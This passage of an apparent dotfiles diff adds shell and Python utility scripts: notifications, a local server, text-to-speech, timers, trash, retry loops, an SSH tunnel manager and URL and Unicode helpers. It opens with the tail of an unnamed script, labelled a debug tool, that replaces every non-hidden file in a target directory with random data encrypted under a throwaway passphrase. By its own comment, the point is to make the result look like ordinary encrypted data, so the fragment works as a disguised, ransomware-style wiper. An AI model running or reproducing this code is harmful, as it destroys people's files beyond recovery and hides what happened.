if [ ! -d "$TARGET_DIR" ]; then
    echo "ERROR: Not a directory: $TARGET_DIR"
    exit 1
fi

# Normalize to an absolute path.
TARGET_DIR=$(cd "$TARGET_DIR" && pwd)

# Non-hidden regular files directly inside the target (bash 4+ mapfile;
# filenames containing newlines would be split — acceptable for a debug tool).
mapfile -t FILES < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*")

echo "Found ${#FILES[@]} files:"
for file in "${FILES[@]}"; do
    echo " - $file"
done

echo ""
echo "Processing files..."

for file in "${FILES[@]}"; do
    filename=$(basename "$file")
    filesize=$(stat -c%s "$file")

    # Round size up to whole MiB (minimum 1) for the dd call below.
    size_mb=$(( (filesize / 1048576) + 1 ))
    if [ $size_mb -lt 1 ]; then
        size_mb=1
    fi

    echo ""
    echo "=== Processing: $filename ==="
    echo " Full path: $file"
    echo " Size: ${filesize} bytes"
    echo " Will create: ${size_mb}MB encrypted file"
    echo " Temp file: ${file}.tmp"

    echo -n " Creating encrypted data... "
    # Random bytes -> symmetric gpg with a throwaway passphrase, so the
    # replacement content looks like ordinary encrypted data.
    if dd if=/dev/urandom bs=1M count=$size_mb 2>/dev/null | \
        gpg --symmetric --cipher-algo AES256 --batch \
        --passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then
        echo "✓"

        echo " Temp file created:"
        ls -lh "${file}.tmp"

        echo -n " Moving temp to final location... "
        echo " Command: mv \"${file}.tmp\" \"${file}\""

        if mv "${file}.tmp" "${file}"; then
            echo "✓ SUCCESS"
            echo " Final file:"
            ls -lh "$file"
        else
            echo "✗ FAILED"
            echo " ERROR CODE: $?"
            ls -la "${file}.tmp" "$file" 2>&1 || true
        fi
    else
        echo "✗ FAILED to create encrypted file"
    fi
done

echo ""
echo "=== COMPLETE ==="
echo "Final directory state:"
ls -lah "$TARGET_DIR"
|
||||
84
scripts/send-ntfy
Executable file
84
scripts/send-ntfy
Executable file
|
|
@ -0,0 +1,84 @@
|
|||
#!/bin/bash
# send-ntfy - Send notification via ntfy using credentials from ~/.env
#
# Usage: send-ntfy <topic> <message> [title] [priority] [tags]
# Env:   NTFY_URL    ntfy server (https:// prefixed automatically)
#        NTFY_TOKEN  bearer token, or
#        NTFY_AUTH   user:pass for basic auth

set -euo pipefail

# Load credentials from ~/.env (set -a exports everything it defines)
if [ -f "$HOME/.env" ]; then
    set -a
    source "$HOME/.env"
    set +a
else
    echo "Error: ~/.env not found" >&2
    exit 1
fi

# Check for URL
if [ -z "${NTFY_URL:-}" ]; then
    echo "Error: NTFY_URL must be set in ~/.env" >&2
    exit 1
fi

# Add https:// if missing
if [[ ! "$NTFY_URL" =~ ^https?:// ]]; then
    NTFY_URL="https://$NTFY_URL"
fi

# Parse arguments
TOPIC="${1:-alerts}"
MESSAGE="${2:-}"
TITLE="${3:-}"
PRIORITY="${4:-default}"
TAGS="${5:-}"

if [ -z "$MESSAGE" ]; then
    echo "Usage: send-ntfy <topic> <message> [title] [priority] [tags]" >&2
    echo "" >&2
    echo "Examples:" >&2
    echo " send-ntfy alerts 'Backup completed'" >&2
    echo " send-ntfy security 'Suspicious login' 'Security Alert' urgent 'warning,shield'" >&2
    echo " send-ntfy personal 'Meeting in 5 minutes'" >&2
    exit 1
fi

# Build full URL with topic
FULL_URL="$NTFY_URL/$TOPIC"

# Build curl options array (-w appends the status code on its own line)
CURL_OPTS=(
    -s
    --http1.1
    -w "\n%{http_code}"
    -d "$MESSAGE"
)

# Add authentication
if [ -n "${NTFY_TOKEN:-}" ]; then
    CURL_OPTS+=(-H "Authorization: Bearer $NTFY_TOKEN")
elif [ -n "${NTFY_AUTH:-}" ]; then
    CURL_OPTS+=(-u "$NTFY_AUTH")
else
    echo "Error: NTFY_TOKEN or NTFY_AUTH must be set in ~/.env" >&2
    exit 1
fi

# Add optional headers
[ -n "$TITLE" ] && CURL_OPTS+=(-H "Title: $TITLE")
[ -n "$PRIORITY" ] && CURL_OPTS+=(-H "Priority: $PRIORITY")
[ -n "$TAGS" ] && CURL_OPTS+=(-H "Tags: $TAGS")

# Send notification
RESULT=$(curl "${CURL_OPTS[@]}" "$FULL_URL" 2>&1)

# Extract HTTP code (last line; everything before it is the body)
HTTP_CODE=$(echo "$RESULT" | tail -1)
RESPONSE=$(echo "$RESULT" | sed '$d')

# FIX: treat any 2xx status as success instead of exactly 200 — the
# server (or a proxy in front of it) may legitimately answer 201/202/204.
if [[ "$HTTP_CODE" =~ ^2[0-9][0-9]$ ]]; then
    echo "✅ Notification sent to $TOPIC"
    exit 0
else
    echo "❌ Failed: HTTP $HTTP_CODE" >&2
    [ -n "$RESPONSE" ] && echo "Response: $RESPONSE" >&2
    exit 1
fi
|
||||
30
scripts/serveit
Executable file
30
scripts/serveit
Executable file
|
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: serveit
# Description: Quick static file server on localhost
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: serveit [port]   # defaults to 8000

port='8000'
if [[ $# -eq 1 ]]; then
  port="$1"
fi

# Try servers in order of preference, exec-ing the first one found.
if command -v php >/dev/null 2>&1; then
  exec php -S "localhost:$port"
fi

if command -v python3 >/dev/null 2>&1; then
  exec python3 -m http.server "$port"
fi

if command -v python >/dev/null 2>&1; then
  # Bare "python" may be 2 or 3; the module name differs between them.
  major_version="$(python -c 'import platform as p;print(p.python_version_tuple()[0])')"
  if [[ "$major_version" == '3' ]]; then
    exec python -m http.server "$port"
  fi
  exec python -m SimpleHTTPServer "$port"
fi

if command -v ruby >/dev/null 2>&1; then
  exec ruby -run -e httpd . -p "$port"
fi

echo 'unable to start HTTP server' >&2
exit 1
|
||||
13
scripts/sleepybear
Executable file
13
scripts/sleepybear
Executable file
|
|
@ -0,0 +1,13 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: sleepybear
# Description: Put system to sleep
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: sleepybear

case "$(uname)" in
  Darwin)
    # macOS: ask System Events to sleep the machine.
    exec /usr/bin/osascript -e 'tell application "System Events" to sleep'
    ;;
  *)
    # Linux (systemd): suspend to RAM.
    systemctl suspend
    ;;
esac
|
||||
48
scripts/speak
Executable file
48
scripts/speak
Executable file
|
|
@ -0,0 +1,48 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: speak
# Description: Text-to-speech with ElevenLabs/Piper/espeak support
# Source: Enhanced from https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: echo "text" | speak
#        speak < file.txt
#        cat README.md | speak

# Strip markdown if pandoc is available (both branches read stdin)
if command -v pandoc &>/dev/null; then
    text=$(pandoc -f commonmark -t plain --wrap=preserve)
else
    text=$(cat)
fi

# Try voice systems in order of preference:
# 1. ElevenLabs (best quality, requires API)
# 2. Piper (good quality, local)
# 3. espeak-ng (fallback)
# 4. say (macOS)
#
# FIXES: detection unified on `command -v` (the original mixed it with
# `hash`), and `echo "$text"` replaced with printf — echo would swallow
# piped text that happens to begin with "-n"/"-e".

if command -v elevenlabs &>/dev/null && [[ -n "${ELEVENLABS_API_KEY:-}" ]]; then
    # Use ElevenLabs (highest quality)
    printf '%s\n' "$text" | elevenlabs tts --voice "Adam" --play
elif command -v piper &>/dev/null; then
    # Use Piper (good local TTS)
    # Look for installed voice models
    piper_voice_dir="$HOME/.local/share/piper/voices"
    if [[ -f "$piper_voice_dir/en_US-amy-medium.onnx" ]]; then
        printf '%s\n' "$text" | piper --model "$piper_voice_dir/en_US-amy-medium.onnx" --output-raw | aplay -r 22050 -f S16_LE -t raw -
    else
        echo "Error: Piper voice model not found at $piper_voice_dir" >&2
        echo "Download with: piper --download-dir $piper_voice_dir --download en_US-amy-medium" >&2
        exit 1
    fi
elif command -v espeak-ng &>/dev/null; then
    # Use espeak-ng (basic but reliable)
    printf '%s\n' "$text" | espeak-ng
elif command -v say &>/dev/null; then
    # Use macOS say
    printf '%s\n' "$text" | say
else
    echo "Error: No TTS program found" >&2
    echo "Install one of: piper, espeak-ng, or set ELEVENLABS_API_KEY" >&2
    exit 1
fi
|
||||
10
scripts/straightquote
Executable file
10
scripts/straightquote
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: straightquote
# Description: Convert curly/smart quotes to straight quotes
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
#
# FIX: the original used tr, but curly quotes are multi-byte UTF-8
# characters and GNU tr operates on single bytes, corrupting the
# output. sed bracket expressions are multibyte-aware in UTF-8 locales.

# “ ” → "   and   ‘ ’ → '
sed -e 's/[“”]/"/g' -e "s/[‘’]/'/g"
|
||||
40
scripts/timer
Executable file
40
scripts/timer
Executable file
|
|
@ -0,0 +1,40 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: timer
# Description: Countdown timer with audio and notification
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: timer 5m
#        timer 30s
#        timer 1h

if [[ $# -ne 1 ]]; then
  echo "Usage: timer <duration>" >&2
  echo "Examples: timer 5m, timer 30s, timer 1h" >&2
  exit 1
fi

duration="$1"

# FIX: the original branched on `command -v gum` but both branches ran
# the identical sleep — the dead distinction is removed.
echo "⏱️ Timer started for $duration"
sleep "$duration"

# Play notification sound if available (backgrounded so the desktop
# notification below isn't delayed by audio playback)
if command -v paplay &>/dev/null && [[ -f /usr/share/sounds/freedesktop/stereo/complete.oga ]]; then
  paplay /usr/share/sounds/freedesktop/stereo/complete.oga &
elif command -v aplay &>/dev/null && [[ -f /usr/share/sounds/freedesktop/stereo/complete.wav ]]; then
  aplay /usr/share/sounds/freedesktop/stereo/complete.wav &
fi

# Send desktop notification
if command -v notify-send &>/dev/null; then
  notify-send "⏰ Timer Complete" "Timer finished: $duration"
fi

echo "✅ Timer complete: $duration"
|
||||
23
scripts/tmux-claude-code.sh
Executable file
23
scripts/tmux-claude-code.sh
Executable file
|
|
@ -0,0 +1,23 @@
|
|||
#!/usr/bin/env bash
# tmux-claude-code.sh - Smart Claude Code launcher for tmux
#
# Finds existing Claude Code tmux window or creates new one
# Usage: tmux-claude-code.sh

# First tmux window whose name mentions claude or code (case-insensitive).
existing="$(tmux list-windows -F '#{window_name}' 2>/dev/null | grep -iE "claude|code" | head -1)"

if [ -z "$existing" ]; then
  # Nothing found - spawn a fresh window running claude-code.
  tmux new-window -n "claude-code" "claude-code"

  echo "Created new Claude Code window"
else
  # Jump to the window we found...
  tmux select-window -t "$existing"

  # ...and raise the Ghostty terminal so it becomes visible.
  wmctrl -a ghostty 2>/dev/null || xdotool search --class ghostty windowactivate 2>/dev/null

  echo "Switched to existing Claude Code window: $existing"
fi
|
||||
28
scripts/trash
Executable file
28
scripts/trash
Executable file
|
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: trash
# Description: Move files to trash instead of permanent deletion
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Credit: macOS implementation modified from https://github.com/morgant/tools-osx
# Usage: trash file1 file2 dir1

if [[ $# -eq 0 ]]; then
  echo "Usage: trash <file1> [file2] ..." >&2
  exit 1
fi

if [[ "$(uname)" != 'Darwin' ]]; then
  # Linux: gio (glib2) implements the freedesktop.org trash spec.
  if ! command -v gio &>/dev/null; then
    echo "Error: 'gio' command not found. Install glib2 package." >&2
    exit 1
  fi
  gio trash "$@"
else
  # macOS: route each path through Finder via AppleScript so items land
  # in the regular Trash and stay restorable.
  for item in "$@"; do
    resolved="$(realpath "$item")"
    /usr/bin/osascript -e "tell application \"Finder\" to delete POSIX file \"$resolved\"" > /dev/null
  done
fi
|
||||
15
scripts/tryna
Executable file
15
scripts/tryna
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
#!/usr/bin/env bash
set -u

# Script Name: tryna
# Description: Retry command until success (every 0.5s)
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
# Usage: tryna curl https://example.com
#        tryna nc -zv localhost 8080

# IDIOM: `until` expresses the original run / check-$? / re-run loop
# directly, without relying on $? surviving across the loop body.
# Exit status is 0 once the command finally succeeds, as before.
until "$@"; do
  sleep 0.5
done
|
||||
15
scripts/trynafail
Executable file
15
scripts/trynafail
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
#!/usr/bin/env bash
set -u

# Script Name: trynafail
# Description: Run command until it fails (every 0.5s)
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
# Usage: trynafail nc -zv localhost 8080 # monitor until service dies
#        trynafail curl -sf https://api.example.com/health

# Run once, then keep re-running every half second while it succeeds.
# The $?-based condition (rather than `while "$@"`) keeps the script's
# final exit status equal to that of the last, failing run.
"$@"
while (( $? == 0 )); do
  sleep 0.5
  "$@"
done
|
||||
16
scripts/tunes
Executable file
16
scripts/tunes
Executable file
|
|
@ -0,0 +1,16 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: tunes
# Description: Play audio files with mpv (supports shuffle, playlists, URLs)
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: tunes song.mp3
#        tunes --shuffle ~/music/
#        tunes https://youtube.com/watch?v=xxxxx

if ! command -v mpv &>/dev/null; then
  echo "Error: mpv not found. Install with: sudo apt install mpv" >&2
  exit 1
fi

# Audio only; for URLs, yt-dlp picks the best audio-only stream.
exec mpv --no-video --ytdl-format=bestaudio "$@"
|
||||
348
scripts/tunnel
Executable file
348
scripts/tunnel
Executable file
|
|
@ -0,0 +1,348 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: tunnel
# Description: SSH tunnel manager with saved configurations
# Usage: tunnel list # List saved tunnels
#        tunnel add name user@host:port ... # Add new tunnel config
#        tunnel start name # Start a saved tunnel
#        tunnel stop name # Stop a running tunnel
#        tunnel status # Show active tunnels
#
# State layout:
#   ~/.tunnels/tunnels.conf  one tunnel per line: "name|target|ssh args"
#   ~/.tunnels/pids/NAME.pid PID of the backgrounded ssh for NAME

VERSION="1.0.0"
TUNNEL_DIR="$HOME/.tunnels"
TUNNEL_CONF="$TUNNEL_DIR/tunnels.conf"
PID_DIR="$TUNNEL_DIR/pids"

# Colors (ANSI escapes, expanded by echo -e throughout)
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||
|
||||
# Initialize tunnel directory
# Create ~/.tunnels (config file + pid dir) on first run; no-op after.
init_tunnel() {
  if [[ -d "$TUNNEL_DIR" ]]; then
    return 0
  fi
  mkdir -p "$TUNNEL_DIR" "$PID_DIR"
  touch "$TUNNEL_CONF"
}
|
||||
|
||||
# Print the full usage/help text (commands, tunnel types, examples)
# to stdout.
show_help() {
  echo -e "${BOLD}tunnel${NC} - SSH Tunnel Manager v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo " tunnel <COMMAND> [OPTIONS]"
  echo
  echo -e "${BOLD}COMMANDS:${NC}"
  echo -e " ${CYAN}list${NC} List all saved tunnels"
  echo -e " ${CYAN}add NAME SPEC${NC} Add new tunnel configuration"
  echo -e " ${CYAN}start NAME${NC} Start a saved tunnel"
  echo -e " ${CYAN}stop NAME${NC} Stop a running tunnel"
  echo -e " ${CYAN}restart NAME${NC} Restart a tunnel"
  echo -e " ${CYAN}status${NC} Show active tunnels"
  echo -e " ${CYAN}delete NAME${NC} Delete saved tunnel"
  echo -e " ${CYAN}edit NAME${NC} Edit tunnel configuration"
  echo
  echo -e "${BOLD}TUNNEL TYPES:${NC}"
  echo -e " ${YELLOW}Local forward:${NC} -L local_port:remote_host:remote_port"
  echo -e " ${YELLOW}Remote forward:${NC} -R remote_port:local_host:local_port"
  echo -e " ${YELLOW}Dynamic (SOCKS):${NC} -D local_port"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo " # Forward local port 3000 to remote port 80"
  echo " tunnel add web user@server.com -L 3000:localhost:80"
  echo
  echo " # Expose local port 8080 on remote port 9000"
  echo " tunnel add reverse user@server.com -R 9000:localhost:8080"
  echo
  echo " # SOCKS proxy on local port 1080"
  echo " tunnel add socks user@server.com -D 1080"
  echo
  echo " # Multiple forwards"
  echo " tunnel add multi user@server.com -L 3000:localhost:80 -L 5432:localhost:5432"
  echo
  echo " # Start/stop tunnels"
  echo " tunnel start web"
  echo " tunnel stop web"
  echo " tunnel status"
}
|
||||
|
||||
# Add tunnel configuration
# add_tunnel NAME USER@HOST SSH_ARGS...
# Appends one pipe-delimited line ("name|target|args") to the config;
# refuses duplicates. The ssh args are flattened into a single string.
add_tunnel() {
  local name="$1" ssh_target="$2"
  shift 2
  local ssh_args="$*"

  if grep -q "^$name|" "$TUNNEL_CONF" 2>/dev/null; then
    echo -e "${RED}Error:${NC} Tunnel '$name' already exists"
    echo "Use: tunnel delete $name (then re-add)"
    return 1
  fi

  echo "$name|$ssh_target|$ssh_args" >> "$TUNNEL_CONF"
  echo -e "${GREEN}✓${NC} Added tunnel: ${BOLD}$name${NC}"
  echo -e " Target: $ssh_target"
  echo -e " Args: $ssh_args"
}
|
||||
|
||||
# List tunnels
# Print every saved tunnel from $TUNNEL_CONF with a coloured status:
#   ● running — pid file exists and the process is alive
#   ● dead    — pid file exists but the process is gone (file removed)
#   ○ stopped — no pid file
list_tunnels() {
  if [[ ! -f "$TUNNEL_CONF" ]] || [[ ! -s "$TUNNEL_CONF" ]]; then
    echo -e "${YELLOW}No tunnels configured${NC}"
    echo "Add one with: tunnel add <name> <user@host> <args>"
    return 0
  fi

  echo -e "${BOLD}${CYAN}Saved Tunnels:${NC}"
  echo

  # Config lines are "name|target|args".
  while IFS='|' read -r name target args; do
    # Check if running
    pid_file="$PID_DIR/$name.pid"
    if [[ -f "$pid_file" ]]; then
      pid=$(cat "$pid_file")
      if ps -p "$pid" &>/dev/null; then
        status="${GREEN}●${NC} running"
      else
        # Stale pid file: clean it up while we're here.
        status="${RED}●${NC} dead"
        rm -f "$pid_file"
      fi
    else
      status="${YELLOW}○${NC} stopped"
    fi

    echo -e " [$status] ${BOLD}$name${NC}"
    echo -e " Target: $target"
    echo -e " Args: $args"
    echo
  done < "$TUNNEL_CONF"
}
|
||||
|
||||
# Get tunnel config
# Print the config line "name|target|args" for NAME to stdout.
# Returns 1 (with a message on stderr) when the config file or the
# entry is missing.
get_tunnel() {
  local name="$1"

  if [[ ! -f "$TUNNEL_CONF" ]]; then
    echo -e "${RED}Error:${NC} No tunnels configured" >&2
    return 1
  fi

  # FIX: declaration split from assignment — `local line=$(grep ...)`
  # masked grep's exit status (SC2155). `|| true` keeps a missing entry
  # from tripping the script-level set -e; the -z check below handles it.
  local line
  line=$(grep "^$name|" "$TUNNEL_CONF" || true)
  if [[ -z "$line" ]]; then
    echo -e "${RED}Error:${NC} Tunnel '$name' not found" >&2
    return 1
  fi

  echo "$line"
}
|
||||
|
||||
# Start tunnel
# Launch the saved ssh command for NAME in the background and record
# its PID so status/stop can manage it. No-op if already running.
start_tunnel() {
  local name="$1"

  # Propagate a lookup failure gracefully instead of letting `local`
  # mask it and running ssh with empty target/args.
  local config
  config=$(get_tunnel "$name") || return 1
  IFS='|' read -r _ target args <<< "$config"

  pid_file="$PID_DIR/$name.pid"

  # Check if already running
  if [[ -f "$pid_file" ]]; then
    pid=$(cat "$pid_file")
    if ps -p "$pid" &>/dev/null; then
      echo -e "${YELLOW}⚠${NC} Tunnel '$name' is already running (PID: $pid)"
      return 0
    else
      rm -f "$pid_file"
    fi
  fi

  echo -e "${CYAN}[*]${NC} Starting tunnel: ${BOLD}$name${NC}"
  echo -e " Target: $target"
  echo -e " Args: $args"

  # BUG FIX: the original ran `ssh -f -N $args "$target" &` and saved $!.
  # With -f, ssh forks and the parent exits after authenticating, so $!
  # pointed at an already-dead process: every tunnel immediately showed
  # as "dead" and could never be stopped. Backgrounding ssh ourselves
  # (without -f) keeps $! pointing at the real tunnel process.
  # shellcheck disable=SC2086  # $args is a stored flag string; splitting is intended
  ssh -N $args "$target" &
  local pid=$!

  echo "$pid" > "$pid_file"
  echo -e "${GREEN}✓${NC} Tunnel started (PID: $pid)"
}
|
||||
|
||||
# Stop tunnel
# Kill the ssh process recorded in NAME's pid file, escalating to
# SIGKILL if it ignores SIGTERM. Stale/missing pid files are handled
# as a successful no-op.
stop_tunnel() {
  local name="$1"
  local pid_file="$PID_DIR/$name.pid"

  if [[ ! -f "$pid_file" ]]; then
    echo -e "${YELLOW}⚠${NC} Tunnel '$name' is not running"
    return 0
  fi

  local pid
  pid=$(cat "$pid_file")

  if ! ps -p "$pid" &>/dev/null; then
    echo -e "${YELLOW}⚠${NC} Tunnel process not found (stale PID file)"
    rm -f "$pid_file"
    return 0
  fi

  echo -e "${CYAN}[*]${NC} Stopping tunnel: ${BOLD}$name${NC} (PID: $pid)"
  kill "$pid" 2>/dev/null || true

  # Give the process a moment to exit cleanly before forcing it.
  sleep 1
  if ps -p "$pid" &>/dev/null; then
    echo -e "${YELLOW}⚠${NC} Process didn't stop gracefully, using SIGKILL"
    kill -9 "$pid" 2>/dev/null || true
  fi

  rm -f "$pid_file"
  echo -e "${GREEN}✓${NC} Tunnel stopped"
}
|
||||
|
||||
# Restart tunnel
# Stop NAME (no-op if not running), pause briefly so the old process
# releases its ports, then start it again.
restart_tunnel() {
  echo -e "${CYAN}[*]${NC} Restarting tunnel: ${BOLD}$1${NC}"
  stop_tunnel "$1"
  sleep 1
  start_tunnel "$1"
}
|
||||
|
||||
# Show status of all tunnels
# Print only the tunnels whose pid file points at a live process;
# stopped/stale entries are silently skipped (see list_tunnels for those).
show_status() {
  echo -e "${BOLD}${CYAN}Active SSH Tunnels:${NC}"
  echo

  local found_any=false

  if [[ -f "$TUNNEL_CONF" ]]; then
    # Config lines are "name|target|args".
    while IFS='|' read -r name target args; do
      pid_file="$PID_DIR/$name.pid"
      if [[ -f "$pid_file" ]]; then
        pid=$(cat "$pid_file")
        if ps -p "$pid" &>/dev/null; then
          found_any=true
          echo -e " ${GREEN}●${NC} ${BOLD}$name${NC} (PID: $pid)"
          echo -e " $target $args"
          echo
        fi
      fi
    done < "$TUNNEL_CONF"
  fi

  if [[ "$found_any" == "false" ]]; then
    echo -e " ${YELLOW}No active tunnels${NC}"
  fi
}
|
||||
|
||||
# Delete tunnel
# Remove NAME's entry from the config, stopping the tunnel first if it
# is currently running. Returns 1 when NAME is unknown.
delete_tunnel() {
  local name="$1"

  if ! grep -q "^$name|" "$TUNNEL_CONF" 2>/dev/null; then
    echo -e "${RED}Error:${NC} Tunnel '$name' not found"
    return 1
  fi

  # Stop if running
  local pid_file="$PID_DIR/$name.pid"
  if [[ -f "$pid_file" ]]; then
    echo -e "${YELLOW}⚠${NC} Stopping running tunnel first..."
    stop_tunnel "$name"
  fi

  # FIX: remove the entry by comparing the literal first field with awk
  # instead of interpolating $name into a `sed -i "/^$name|/d"` pattern —
  # names containing '/', '.', '[' or other regex metacharacters would
  # corrupt the sed expression or delete the wrong lines.
  local tmp
  tmp=$(mktemp)
  awk -F'|' -v n="$name" '$1 != n' "$TUNNEL_CONF" > "$tmp"
  mv "$tmp" "$TUNNEL_CONF"
  echo -e "${GREEN}✓${NC} Deleted tunnel: ${BOLD}$name${NC}"
}
|
||||
|
||||
# Edit tunnel
# After checking that NAME exists, open the whole config file in
# $EDITOR (falling back to vim). The name argument is only validated,
# not used to scope the edit.
edit_tunnel() {
  local name="$1"

  grep -q "^$name|" "$TUNNEL_CONF" 2>/dev/null || {
    echo -e "${RED}Error:${NC} Tunnel '$name' not found"
    return 1
  }

  "${EDITOR:-vim}" "$TUNNEL_CONF"
  echo -e "${GREEN}✓${NC} Configuration updated"
}
|
||||
|
||||
# Initialize
# Ensure ~/.tunnels exists before any sub-command touches it.
init_tunnel

# Parse command
# No args or a help flag prints usage and exits successfully.
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

command="$1"
shift

# Dispatch to the handler for the sub-command; most accept aliases.
# Remaining positional args are forwarded as the handler's arguments.
case "$command" in
  list|ls)
    list_tunnels
    ;;
  add|new)
    if [[ $# -lt 2 ]]; then
      echo -e "${RED}Error:${NC} Usage: tunnel add <name> <user@host> <args>"
      exit 1
    fi
    add_tunnel "$@"
    ;;
  start|up)
    if [[ $# -lt 1 ]]; then
      echo -e "${RED}Error:${NC} Usage: tunnel start <name>"
      exit 1
    fi
    start_tunnel "$1"
    ;;
  stop|down)
    if [[ $# -lt 1 ]]; then
      echo -e "${RED}Error:${NC} Usage: tunnel stop <name>"
      exit 1
    fi
    stop_tunnel "$1"
    ;;
  restart)
    if [[ $# -lt 1 ]]; then
      echo -e "${RED}Error:${NC} Usage: tunnel restart <name>"
      exit 1
    fi
    restart_tunnel "$1"
    ;;
  status|ps)
    show_status
    ;;
  delete|del|rm)
    if [[ $# -lt 1 ]]; then
      echo -e "${RED}Error:${NC} Usage: tunnel delete <name>"
      exit 1
    fi
    delete_tunnel "$1"
    ;;
  edit)
    if [[ $# -lt 1 ]]; then
      echo -e "${RED}Error:${NC} Usage: tunnel edit <name>"
      exit 1
    fi
    edit_tunnel "$1"
    ;;
  *)
    echo -e "${RED}Error:${NC} Unknown command: $command"
    echo "Run 'tunnel --help' for usage"
    exit 1
    ;;
esac
|
||||
43
scripts/u+
Executable file
43
scripts/u+
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/env python3
|
||||
"""
|
||||
Script Name: u+
|
||||
Description: Unicode character lookup by hex code
|
||||
Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
Usage: u+ 1F4A9 # 💩 PILE OF POO
|
||||
u+ 2665 # ♥ BLACK HEART SUIT
|
||||
u+ 0041 # A LATIN CAPITAL LETTER A
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import sys
|
||||
import unicodedata
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description='Look up Unicode character by hex code')
|
||||
parser.add_argument('hex_code', help='Hexadecimal Unicode code point (e.g., 1F600)')
|
||||
args = parser.parse_args()
|
||||
|
||||
try:
|
||||
# Convert hex to int
|
||||
code_point = int(args.hex_code, 16)
|
||||
|
||||
# Get character and name
|
||||
char = chr(code_point)
|
||||
try:
|
||||
name = unicodedata.name(char)
|
||||
except ValueError:
|
||||
name = "<no name available>"
|
||||
|
||||
# Output: character and name
|
||||
print(f"{char} U+{args.hex_code.upper()} {name}")
|
||||
|
||||
except ValueError:
|
||||
print(f"Error: Invalid hex code '{args.hex_code}'", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
except Exception as e:
|
||||
print(f"Error: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
37
scripts/url
Executable file
37
scripts/url
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: url
|
||||
# Description: Parse URLs into component parts
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: url "https://user:pass@example.com:8080/path?query=1#fragment"
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: url <url>" >&2
|
||||
echo "Example: url 'https://example.com:8080/path?key=value#section'" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
echo "original: $url"
|
||||
|
||||
# Parse URL using regex
|
||||
if [[ $url =~ ^([a-z][a-z0-9+.-]*):(//)?(([^:/@]+)(:([^/@]+))?@)?([^/:?#]+)?(:([0-9]+))?(/[^?#]*)?(\\?([^#]*))?(#.*)? ]]; then
|
||||
scheme="${BASH_REMATCH[1]:-}"
|
||||
username="${BASH_REMATCH[4]:-}"
|
||||
password="${BASH_REMATCH[6]:-}"
|
||||
hostname="${BASH_REMATCH[7]:-}"
|
||||
port="${BASH_REMATCH[9]:-}"
|
||||
path="${BASH_REMATCH[10]:-}"
|
||||
query="${BASH_REMATCH[12]:-}"
|
||||
fragment="${BASH_REMATCH[14]:-}"
|
||||
fi
|
||||
|
||||
echo "protocol: ${scheme:-}"
|
||||
[[ -n "${username:-}" ]] && echo "username: $username"
|
||||
[[ -n "${password:-}" ]] && echo "password: $password"
|
||||
[[ -n "${hostname:-}" ]] && echo "hostname: $hostname"
|
||||
[[ -n "${port:-}" ]] && echo "port: $port"
|
||||
[[ -n "${path:-}" ]] && echo "path: $path"
|
||||
[[ -n "${query:-}" ]] && echo "query: ${query#\?}"
|
||||
[[ -n "${fragment:-}" ]] && echo "hash: ${fragment#\#}"
|
||||
37
scripts/uuid
Executable file
37
scripts/uuid
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: uuid
|
||||
# Description: Generate v4 UUID (useful for security testing, tokens, identifiers)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: uuid # generate one UUID
|
||||
# uuid 5 # generate 5 UUIDs
|
||||
# uuid | pbcopy # copy to clipboard
|
||||
|
||||
count=${1:-1}
|
||||
|
||||
